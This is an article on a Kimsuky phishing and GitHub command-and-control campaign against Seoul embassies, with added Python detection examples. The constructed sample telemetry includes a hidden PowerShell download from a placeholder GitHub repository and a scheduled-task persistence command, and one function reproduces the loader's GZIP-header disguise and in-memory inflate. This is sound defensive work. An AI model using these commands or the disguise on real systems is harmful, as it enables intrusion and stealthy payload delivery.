Inside Kimsuky’s GitHub-Powered Cyber-Espionage Campaign
At the beginning of 2025, Trellix specialists uncovered a sweeping cyber-espionage campaign targeting diplomatic missions in Seoul. Between March and July, at least nineteen phishing attacks were recorded, in which North Korean–linked actors impersonated diplomats and distributed convincing invitations to meetings, official letters, and event notifications.
The campaign’s most notable feature was its use of GitHub as a covert command-and-control channel for compromised systems. Malicious payloads were delivered through cloud services such as Dropbox and Daum, while the attackers’ primary weapon was a customized variant of the XenoRAT remote administration tool, granting them full control over victims’ workstations and enabling extensive intelligence collection. Infrastructure analysis confirmed a direct connection to the activities of Kimsuky, long notorious for its espionage operations on behalf of North Korea.
The attack unfolded in multiple stages. Embassy staff first received password-protected archives, with the password framed as a confidentiality measure (it also keeps the contents out of reach of mail-gateway scanning). Inside was a shortcut (.lnk) file with a double extension and a PDF icon. When opened, the shortcut ran a PowerShell script that fetched the next stage from GitHub and established persistence through a scheduled task. The malware then collected system information and exfiltrated it through the GitHub API. Because this traffic is ordinary HTTPS to GitHub domains that most organizations allow, it blended in with legitimate activity.
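The chain above gives a defender three observable points: a double-extension .lnk landing on disk, PowerShell pulling content from a GitHub domain, and a scheduled task created with PowerShell as its parent. The Python below is an added example, not code from Trellix or from the campaign, that runs three such rules over a handful of constructed process-creation and file-creation records shaped like Sysmon fields; every path, account, repository and task name in the sample data is invented for illustration.

```python
import re

# Constructed sample telemetry (hypothetical; shaped like Sysmon Event ID 1
# process-creation and Event ID 11 file-creation fields). Paths, the GitHub
# account and repository names and the task name are invented for this example.
SAMPLE_EVENTS = [
    {"EventType": "FileCreate",
     "Image": r"C:\Program Files\7-Zip\7zG.exe",
     "TargetFilename": r"C:\Users\staff\Downloads\Invitation\Invitation.pdf.lnk"},
    {"EventType": "ProcessCreate",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": (r'powershell.exe -w hidden -ep bypass -c "iwr '
                     r'https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/main/stage2.txt '
                     r'-OutFile $env:TEMP\stage2.txt"')},
    {"EventType": "ProcessCreate",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": (r'schtasks.exe /create /sc minute /mo 10 /tn "OneDriveUpdateTask" '
                     r'/tr "powershell -w hidden -f C:\Users\staff\AppData\Roaming\update.ps1" /f')},
    {"EventType": "ProcessCreate",  # benign: an admin running a cmdlet by hand
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Get-Process"'},
    {"EventType": "FileCreate",  # benign: an ordinary browser download
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\staff\Downloads\Report.pdf"},
]

# Rule patterns. The document-extension list covers types commonly faked with a
# shortcut; extend it to whatever your users actually receive.
DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|hwp|txt)\.lnk$", re.IGNORECASE)
GITHUB_HOSTS = re.compile(r"\b(raw\.githubusercontent\.com|api\.github\.com|github\.com)\b",
                          re.IGNORECASE)
DOWNLOAD_VERBS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b)", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"schtasks(\.exe)?\s+/create\b", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules compare image names only."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (rule_id, event_index, description) for every event a rule matches."""
    findings = []
    for idx, ev in enumerate(events):
        if ev["EventType"] == "FileCreate":
            if DOUBLE_EXT_LNK.search(ev["TargetFilename"]):
                findings.append(("R1", idx, "double-extension .lnk written to disk"))
        elif ev["EventType"] == "ProcessCreate":
            image = basename(ev["Image"])
            parent = basename(ev["ParentImage"])
            cmd = ev["CommandLine"]
            if image in POWERSHELL and GITHUB_HOSTS.search(cmd) and DOWNLOAD_VERBS.search(cmd):
                findings.append(("R2", idx, "PowerShell downloading content from a GitHub domain"))
            if image == "schtasks.exe" and parent in POWERSHELL and SCHTASKS_CREATE.search(cmd):
                findings.append(("R3", idx, "scheduled task created by a PowerShell parent"))
    return findings


def matched_rules(events):
    """Just the rule ids, in event order, for quick triage."""
    return [rule for rule, _, _ in evaluate(events)]


if __name__ == "__main__":
    for rule, idx, why in evaluate(SAMPLE_EVENTS):
        print(f"{rule} event[{idx}]: {why}")
```

R2 on its own is noisy on developer workstations, where package managers and git pull from GitHub constantly; it earns its keep on hosts that have no business fetching from GitHub (diplomatic staff machines, for instance) or when it fires alongside R1 and R3 on the same host within a short window.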
Particular attention should be paid to how the final payload was retrieved. After being downloaded from Dropbox, the file carried a deliberately corrupted GZIP header, so that a file-type check saw a harmless document rather than a compressed archive. The script restored the header bytes and decompressed the malicious code directly into memory, leaving no decompressed artifact on disk. The last stage activated XenoRAT, which provides stealth features, credential theft modules, keystroke logging, screen and camera capture, and full file management.
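The header trick described above is simple to reproduce and simple to check for. The Python below is an added example, not Trellix's or the attackers' code: it builds a constructed sample by gzip-compressing a stand-in payload and stamping a PDF magic over the leading bytes, shows the loader-side repair and in-memory inflate, and then a defender-side check that ignores the first bytes entirely and asks whether a valid gzip member is hiding behind them. The page does not say which bytes the real loader patched; restoring the fixed four-byte header ID1 ID2 CM FLG (1f 8b 08 00) is this example's assumption.

```python
import gzip
import struct
import zlib

# gzip member layout: ID1 ID2 CM FLG MTIME(4) XFL OS | deflate body | CRC32 ISIZE
GZIP_FIXED_HEADER = b"\x1f\x8b\x08\x00"  # magic, CM=8 (deflate), FLG=0 (no optional fields)
HEADER_LEN = 10
TRAILER_LEN = 8


def build_disguised_blob(payload: bytes, fake_magic: bytes = b"%PDF") -> bytes:
    """Constructed sample only: gzip the payload with no optional header fields,
    then stamp a document magic over the first bytes so a magic-based file-type
    check (or a glance in a hex editor) reports a PDF."""
    if len(fake_magic) > len(GZIP_FIXED_HEADER):
        raise ValueError("fake magic must fit inside the fixed header bytes")
    compressed = gzip.compress(payload, mtime=0)
    return fake_magic + compressed[len(fake_magic):]


def repair_and_inflate(blob: bytes) -> bytes:
    """Loader-side step: put the fixed header back and inflate in memory.
    Assumption (not stated on the page): the first four bytes were what got overwritten."""
    restored = GZIP_FIXED_HEADER + blob[len(GZIP_FIXED_HEADER):]
    return gzip.decompress(restored)


def hidden_deflate_stream(blob: bytes) -> bool:
    """Defender-side check that does not care what the first bytes say: treat the
    file as a gzip member, inflate the raw deflate body such a member would carry
    from offset 10, and confirm the trailing CRC32 and ISIZE match the inflated
    data. A genuine document almost always fails the inflate, and the trailer
    check removes the remaining chance matches."""
    if len(blob) < HEADER_LEN + TRAILER_LEN:
        return False
    body = blob[HEADER_LEN:-TRAILER_LEN]
    inflater = zlib.decompressobj(-zlib.MAX_WBITS)  # raw deflate, no zlib/gzip wrapper
    try:
        data = inflater.decompress(body)
    except zlib.error:
        return False
    if not inflater.eof or inflater.unused_data:
        return False
    crc, isize = struct.unpack("<II", blob[-TRAILER_LEN:])
    return crc == (zlib.crc32(data) & 0xFFFFFFFF) and isize == (len(data) & 0xFFFFFFFF)


# Constructed inputs: a stand-in payload and a fragment of a genuine PDF.
SAMPLE_PAYLOAD = b"Write-Host 'stage 3 would run here'\n" * 20
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"

if __name__ == "__main__":
    blob = build_disguised_blob(SAMPLE_PAYLOAD)
    print("first bytes:", blob[:4], "hidden gzip:", hidden_deflate_stream(blob))
    print("inflated matches payload:", repair_and_inflate(blob) == SAMPLE_PAYLOAD)
    print("real PDF flagged:", hidden_deflate_stream(SAMPLE_PDF))
```

Run hidden_deflate_stream only over files whose claimed type is not gzip; a legitimate .gz file passes it by design. The useful signal is a "document" that inflates cleanly from offset 10 and carries a matching gzip trailer, which is exactly the disguised download the loader expects.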
The phishing waves followed a deliberate rhythm. March 2025 saw initial test runs with neutral subject lines. By May, the operation reached its peak: diplomats received invitations to “political meetings” and U.S. Independence Day celebrations. Later that month, attackers impersonated editors of a fictitious Diplomacy Journal, soliciting interview requests. In June and July, lures shifted toward military and bilateral relations, with the final attack observed on July 28 in an email posing as correspondence from the Polish ambassador.
To strengthen credibility, operators crafted over fifty counterfeit documents in multiple languages, including Korean, English, Persian, Arabic, French, and Russian. These decoys ranged from conference invitations and official notes to admission forms for international schools. Most contained no malware, serving instead as persuasive distractions to convince recipients of the authenticity of the correspondence.
The infrastructure relied on several GitHub accounts (“blairity,” “landjhon”) hosting dozens of repositories with thematic names. Email delivery leveraged Korean services Hanmail and Daum, alongside VPS nodes located in Seoul. Forensic analysis revealed that the adversaries operated within isolated virtual environments running Windows 11 and Server 2022, employed developer toolchains, and monitored processes using native Windows utilities.
According to Trellix, both the choice of targets and the technical tradecraft point directly to Kimsuky. However, pauses in activity aligned with Chinese holidays, and working hours coincided with standard office schedules in China’s time zone. This raises the possibility that parts of the operation were conducted from Chinese territory or with Chinese resources, even though the motivations and toolset remain consistent with North Korean origins.
In sum, this campaign exemplifies the core pillars of modern cyber-espionage: leveraging trusted platforms as covert channels, deploying sophisticated social engineering, and employing multi-layered malware delivery techniques. It remains active and demands heightened vigilance from diplomatic missions and government agencies worldwide.